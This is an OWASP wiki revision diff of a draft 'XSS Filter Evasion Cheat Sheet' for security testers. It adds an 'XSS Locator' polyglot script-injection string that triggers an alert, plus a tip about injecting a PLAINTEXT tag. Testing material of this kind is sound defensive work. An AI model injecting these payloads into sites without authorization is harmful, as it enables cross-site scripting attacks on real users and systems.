Difference between revisions of "XSS Filter Evasion Cheat Sheet"

From OWASP
Jump to: navigation, search
m
Line 6: Line 6:
  
 
= Tests =
 
= Tests =
 +
'''XSS Locator :'''
 +
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this [http://ha.ckers.org/xss.html#XSScalc URL encoding calculator] to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
 +
 +
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
 +
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>
 +
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  
 
= References =
 
= References =

Revision as of 15:01, 3 September 2012

Contents

DRAFT CHEAT SHEET - WORK IN PROGRESS

Introduction

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.

Tests

XSS Locator : Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

References

http://ha.ckers.org/xss.html

Authors and Primary Editors

RSnake

OWASP Cheat Sheets Project Homepage

Developer Cheat Sheets (Builder)

Assessment Cheat Sheets (Breaker)

Mobile Cheat Sheets

OpSec Cheat Sheets (Defender)

Draft Cheat Sheets